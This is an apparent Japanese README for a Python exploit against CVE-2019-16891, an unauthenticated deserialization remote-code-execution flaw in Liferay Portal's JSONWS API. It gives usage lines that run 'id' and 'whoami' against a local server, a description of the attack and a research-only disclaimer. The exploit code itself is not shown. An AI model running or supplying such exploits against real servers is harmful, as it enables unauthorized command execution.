
CVE-2019-16891 Liferay 逆シリアル化 RCE のエクスプロイト
python3 CVE-2019-16891-Liferay-deserialization-RCE.py -u <url> -c <コマンド>
python3 CVE-2019-16891-Liferay-deserialization-RCE.py -u http://127.0.0.1:8080 -c id
python3 CVE-2019-16891-Liferay-deserialization-RCE.py -u http://127.0.0.1:8080 -c whoami
このエクスプロイトは、Liferay ポータルにおける JSON 逆シリアル化の脆弱性を利用して、リモートコード実行(RCE)を実現します。JSONWS API を通じて細工されたペイロードを送信することで、認証なしで任意のコマンドを実行できます。
このエクスプロイトツールは、セキュリティ研究者が脆弱性を理解し、適切な対策を講じるための参考として公開されています。不正利用は禁止されています。